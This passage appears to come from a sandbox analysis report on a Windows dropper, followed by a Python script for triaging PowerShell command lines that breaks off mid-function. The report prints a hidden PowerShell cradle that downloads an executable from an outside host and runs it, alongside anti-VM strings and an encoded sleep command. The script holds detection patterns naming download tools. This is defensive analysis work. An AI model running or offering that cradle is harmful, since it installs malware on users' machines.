                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                    Source: svhost.exe, 00000002.00000002.457069212.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004760000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CCXLFA7AP1jfH6OOqEMU
                    Source: Opgcxhsdw.exe, 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: powershell.exe, 00000000.00000002.383284065.000001D9F46B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWe"%SystemRoot%\system32\mswsock.dllHashed"
                    Source: Opgcxhsdw.exe, 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual?hal9th@johndoe
                    Source: svhost.exe, 00000007.00000002.582385460.00000000015BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\svhost.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\svhost.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\user\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhost.exe'
                    Source: C:\Users\user\AppData\Roaming\svhost.exe Process created: Base64 decoded start-sleep -seconds 20
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe Process created: Base64 decoded start-sleep -seconds 20
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe Process created: Base64 decoded start-sleep -seconds 20
                    Source: C:\Users\user\AppData\Roaming\svhost.exe Memory written: C:\Users\user\AppData\Roaming\svhost.exe base: 400000 value starts with: 4D5A
                    Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('https://oiartzunirratia.eus/install/clean/lcovlccdxd.exe','c:\users\user\appdata\roaming\svhost.exe');start-process 'c:\users\user\appdata\roaming\svhost.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\svhost.exe "C:\Users\user\AppData\Roaming\svhost.exe"
                    Source: C:\Users\user\AppData\Roaming\svhost.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Users\user\AppData\Roaming\svhost.exe Process created: C:\Users\user\AppData\Roaming\svhost.exe C:\Users\user\AppData\Roaming\svhost.exe
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Users\user\AppData\Roaming\svhost.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Users\user\AppData\Roaming\svhost.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
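                    The two PowerShell command lines recorded above are the interesting ones: the download cradle launched from the LNK (execution policy bypassed, profile skipped, window hidden, WebClient.DownloadFile into %APPDATA%\svhost.exe followed by Start-Process) and the -ENC command spawned by svhost.exe, whose base64 is UTF-16LE and decodes to "start-sleep -seconds 20". The following is an added example for triaging such command lines, not part of the Joe Sandbox report. The two command lines are copied from the report; the indicator names, regular expressions, and the two-indicator threshold are this example's own choices.

```python
"""Decode and flag PowerShell command lines like those recorded in the sandbox report.

Added example, not part of the Joe Sandbox report.  The two command lines below are
copied from the report's "Process created" evidence; every function and flag name,
each regex, and the threshold in triage() are this example's own assumptions.
"""
import base64
import re

# Command lines taken from the report's process-creation evidence.
CRADLE_CMDLINE = (
    '"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" '
    "-executionpolicy bypass -noprofile -windowstyle hidden "
    "(new-object system.net.webclient).downloadfile("
    "'https://oiartzunirratia.eus/install/clean/lcovlccdxd.exe',"
    "'c:\\users\\user\\appdata\\roaming\\svhost.exe');"
    "start-process 'c:\\users\\user\\appdata\\roaming\\svhost.exe'"
)
ENCODED_CMDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "-ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA=="
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings most often seen.  "-executionpolicy" does not match because the
# alternation must be followed directly by whitespace.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
_DOWNLOADFILE_RE = re.compile(
    r"(?i)downloadfile\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)"
)
_URL_RE = re.compile(r"(?i)https?://[^\s'\"()]+")

# (flag, regex) pairs.  Each is an independent indicator, not proof on its own.
_INDICATORS = [
    ("execution_policy_bypass", re.compile(r"(?i)-(?:ep|ex\w*)\s+bypass")),
    ("no_profile", re.compile(r"(?i)-nop\w*")),
    ("hidden_window", re.compile(r"(?i)-w\w*\s+hidden")),
    ("download_cradle", re.compile(
        r"(?i)downloadfile|downloadstring|downloaddata|invoke-webrequest|\biwr\b|"
        r"invoke-restmethod|start-bitstransfer|\bcurl\b|\bwget\b")),
    ("executes_payload", re.compile(
        r"(?i)start-process|invoke-expression|\biex\b|invoke-item|\bsaps\b")),
    ("sleep_delay", re.compile(r"(?i)start-sleep|\bsleep\b")),
]


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none.

    The argument is base64 over UTF-16LE text, which is why a plain ASCII decode
    of it shows every other byte as NUL.
    """
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Flag a PowerShell command line and extract the cradle's URL and drop path.

    An encoded command is decoded first and the decoded text is scanned as well,
    so indicators hidden behind -ENC are not missed.
    """
    decoded = decode_encoded_command(cmdline)
    texts = [cmdline] + ([decoded] if decoded else [])
    flags = set()
    if decoded is not None:
        flags.add("encoded_command")
    for text in texts:
        for name, pattern in _INDICATORS:
            if pattern.search(text):
                flags.add(name)
    urls, downloads = [], []
    for text in texts:
        urls.extend(_URL_RE.findall(text))
        downloads.extend((u, d) for u, d in _DOWNLOADFILE_RE.findall(text))
    return {
        "flags": sorted(flags),
        "decoded": decoded,
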